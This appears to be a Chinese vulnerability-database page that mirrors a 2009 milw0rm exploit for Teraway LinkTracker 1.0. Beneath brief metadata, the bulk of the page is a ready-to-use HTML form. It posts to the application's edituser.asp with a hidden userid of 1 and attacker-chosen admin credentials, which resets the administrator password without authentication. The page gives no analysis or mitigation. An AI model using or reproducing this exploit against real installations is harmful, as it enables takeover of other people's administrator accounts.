Teraway LinkTracker 1.0 - Remote Password Change

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057744 漏洞类型
发布时间 2009-04-27 更新时间 2009-04-27
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8553
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<title>Teraway LinkTracker V1.0  Remote Password Change</title>
<form name="form1" method="post" action="http://www.teraway.com/linktracker/demo/edituser.asp">
  <table width="90%" border="0" cellspacing="2" cellpadding="2" align="center">
    <tr>
      <td class="Titles">Cod[3]d By ThE g0bL!N Fi Khater Cristal wa x.CJP.x :)</td>

        
        <input type="hidden" name="userid" value="1">
         </td>
    </tr>
    <tr>
      <td colspan="2" bgcolor="#666666"></td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Name :</b></td>

      
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>E-mail :</b></td>
      <td> <input type="text" name="email" size="40" value="email@here.com" maxlength="250">
      </td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Username :</b></td>

      <td> <input type="text" name="usr" size="40" value="admin" maxlength="250">
      </td>
    </tr>
    <tr align="left" valign="top" class="optionname">
      <td width="200"><b>Password :</b></td>
      <td> <input type="password" name="pwd" size="40" value="admin" maxlength="250">
      </td>
    </tr>
   
      </td>
    </tr>
    <tr class="optionname">
      <td width="200">  </td>
      <td> <input name="button" type="submit" class="generalText" value="Save User" onclick="alerta();">
      </td>
    </tr>

    <tr>
      <td colspan="2" bgcolor="#666666"></td>
    </tr>
  </table>
</form>
</body>
</html>

# milw0rm.com [2009-04-27]